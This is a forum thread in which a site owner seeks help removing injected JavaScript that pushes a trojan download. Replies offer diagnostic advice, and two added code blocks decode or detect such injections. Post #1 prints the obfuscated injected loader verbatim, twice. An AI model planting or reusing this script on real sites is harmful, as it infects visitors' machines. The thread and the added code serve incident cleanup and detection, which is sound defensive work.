  1. #1

    Script injected and need help to remove!

    Hello, in my domain someone has inserted a script into the vBulletin forum or vBadvanced CMPS which downloads a trojan file from another site. So when a visitor visits the site from IE, it executes and asks the visitor to download that exe file.

    So I am trying so hard to find the file or the way it has been inserted. But I still can't find the way, or a way to remove it.

    Hey, I checked and it seems to me some file has been edited or something on my site. That JavaScript is coming at the very top, even before the HTML tags. What file do you think has been edited? I have been trying for hours to find that file.

    It's coming like this, even before the HTML tags, in vBa CMPS:

    Code:
    <script language="JavaScript">e = '0x00' + '72';str1 = "%C9%91%9A%87%ED%80%81%8A%99%96%CE%D3%87%9A%80%9A%93%9A%99%9A%81%8A%CB%95%9A%91%91%96%9F%D3%CF%C9%9A%97%83%92%9E%96%ED%80%83%90%CE%D3%95%81%81%9D%CB%DC%DC%9A%9F%90%9F%81%DF%90%9C%9E%DC%9C%87%83%DC%D3%ED%84%9A%91%81%95%CE%C2%ED%95%96%9A%94%95%81%CE%C2%CF%C9%DC%9A%97%83%92%9E%96%CF%C9%DC%91%9A%87%CF";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script><script language="JavaScript">e = '0x00' + '72';str1 = "%C9%91%9A%87%ED%80%81%8A%99%96%CE%D3%87%9A%80%9A%93%9A%99%9A%81%8A%CB%95%9A%91%91%96%9F%D3%CF%C9%9A%97%83%92%9E%96%ED%80%83%90%CE%D3%95%81%81%9D%CB%DC%DC%9A%9F%90%9F%81%DF%90%9C%9E%DC%9C%87%83%DC%D3%ED%84%9A%91%81%95%CE%C2%ED%95%96%9A%94%95%81%CE%C2%CF%C9%DC%9A%97%83%92%9E%96%CF%C9%DC%91%9A%87%CF";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html dir="ltr" lang="en">
    <head>
    <title>XXXXXXXXX </title>
    
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
    <meta name="generator" content="vBulletin 3.5.4" />
    I have patched to 3.5.6 and changed all the FTP passwords too.

    If someone would like to help me, I can PM him my site URL too.

    If he would like to help me, I can give FTP access too. PLEASE HELP ME!! I'm fully screwed up
    Last edited by anon-e-mouse; 11-11-2006 at 02:29 AM.
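
The script posted above can be read without loading it in a browser. As an added example (not part of the original thread), this Node.js snippet pulls the key and the `%XX` string out of such a script and reverses its XOR-and-subtract step; `SAMPLE_SCRIPT` is constructed here with the same scheme and a placeholder URL.

```javascript
// Added example: static decoder for the obfuscation shown in the post.
// It only returns a string; nothing is evaluated or written to a page.

// Pull the key literal ('0x00' + '72') and the %XX blob out of the script text.
function extractParts(scriptSource) {
  const key = /\be\s*=\s*'([^']*)'\s*\+\s*'([^']*)'/.exec(scriptSource);
  const blob = /\bstr1\s*=\s*"((?:%[0-9A-Fa-f]{2})+)"/.exec(scriptSource);
  if (!key || !blob) return null;
  return { keyLiteral: key[1] + key[2], blob: blob[1] };
}

// Reverse of the posted loop: each %XX byte is XORed with the key, then 127 is subtracted.
function decodeBlob(blob, keyLiteral) {
  const key = Number(keyLiteral); // '0x0072' -> 114, the same coercion ^ applies
  if (!Number.isInteger(key)) throw new Error('unexpected key literal');
  if (!/^(?:%[0-9A-Fa-f]{2})+$/.test(blob)) throw new Error('unexpected blob format');
  let out = '';
  for (let i = 0; i < blob.length; i += 3) {
    const byte = parseInt(blob.slice(i + 1, i + 3), 16);
    out += String.fromCharCode((byte ^ key) - 127);
  }
  return out;
}

// Inverse transform, used only to build the constructed sample below.
function encodeSample(plain, keyLiteral) {
  const key = Number(keyLiteral);
  return Array.from(plain, (c) =>
    '%' + ((c.charCodeAt(0) + 127) ^ key).toString(16).toUpperCase().padStart(2, '0')
  ).join('');
}

// Constructed sample: same wrapper as the post, placeholder markup inside.
const SAMPLE_PLAIN = '<a href="http://placeholder.invalid/">constructed sample</a>';
const SAMPLE_SCRIPT =
  `<script language="JavaScript">e = '0x00' + '72';str1 = "` +
  encodeSample(SAMPLE_PLAIN, '0x0072') +
  `";str=tmp='';</script>`;

// Returns the markup the script would have written, or null if the pattern is absent.
function decodeScript(scriptSource) {
  const parts = extractParts(scriptSource);
  return parts ? decodeBlob(parts.blob, parts.keyLiteral) : null;
}

console.log(decodeScript(SAMPLE_SCRIPT));
```

Feeding the saved page source to `decodeScript` shows what the injected block writes into the page, which helps when searching files and configuration for the same strings.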

  2. #2
    Join Date
    Oct 2006
    Posts
    43
    Hello Miss sameera

    Send it please, I will check your site

    bye

  3. #3
    Join Date
    Jul 2002
    Location
    Tasmania, Australia
    Posts
    34,797
    Moved to employment.
    If you don't like the road you're walking on, start paving a new one.

  4. #4
    Join Date
    Nov 2004
    Location
    Europe
    Posts
    17
    Quote Originally Posted by sameera

    It's coming like this, even before the HTML tags, in vBa CMPS
    Does your server return this code on EVERY page from that domain, or only from vB pages?
    Vladimir

  5. #5
    Join Date
    May 2006
    Posts
    556
    I'm just going to give you some advice... Giving out FTP access to anyone under the sun is probably HOW you got this to begin with...

    To save you some money, I thought the creators of this forum software had support?

  6. #6
    Join Date
    Nov 2004
    Location
    Europe
    Posts
    17
    It may be that it has nothing to do with forum files.

    I have seen something very similar when Apache conf files were hacked and Apache would return such code on every page from the infected domain, even those that do not use vB.

    So if this script is injected into every page, I would rather check Apache than go through the vB files.
    Vladimir
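
The check suggested in the last post can be made repeatable. As an added example (not code from the thread), this Node.js snippet takes page bodies that have already been saved, flags any with a `<script>` block ahead of the document's first tag, and reports where to look first; the `path`, `usesVb` and `body` field names and the sample pages are constructed for illustration.

```javascript
// Added example: decide where to look first, following the advice above.
// Input is a list of already-saved responses; field names are hypothetical.

// True when a <script> block appears before the document's own first tag.
// Bodies without a doctype or <html> tag are not judged and return false.
function hasLeadingScript(body) {
  const start = body.search(/<!doctype|<html/i);
  const prefix = start === -1 ? '' : body.slice(0, start);
  return /<script\b/i.test(prefix);
}

function triage(responses) {
  const hits = responses.filter((r) => hasLeadingScript(r.body));
  const vbHit = hits.filter((r) => r.usesVb).map((r) => r.path);
  const otherHit = hits.filter((r) => !r.usesVb).map((r) => r.path);
  const sampledOther = responses.some((r) => !r.usesVb);

  let lookAt;
  if (hits.length === 0) lookAt = 'nothing injected in these samples';
  else if (otherHit.length > 0) lookAt = 'web server configuration';
  else if (!sampledOther) lookAt = 'inconclusive: sample a page that does not use vB';
  else lookAt = 'forum/CMS files and templates';
  return { vbHit, otherHit, lookAt };
}

// Constructed sample data: a stand-in for the injected block and a clean page.
const INJECT = '<script language="JavaScript">/* constructed stand-in */</script>';
const PAGE = '<!DOCTYPE html><html><head><title>t</title></head><body></body></html>';

const EVERY_PAGE = [
  { path: '/forum/index.php', usesVb: true, body: INJECT + PAGE },
  { path: '/about.html', usesVb: false, body: INJECT + PAGE },
];
const ONLY_VB = [
  { path: '/forum/index.php', usesVb: true, body: INJECT + PAGE },
  { path: '/about.html', usesVb: false, body: PAGE },
];

console.log(triage(EVERY_PAGE).lookAt); // web server configuration
console.log(triage(ONLY_VB).lookAt);    // forum/CMS files and templates
```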
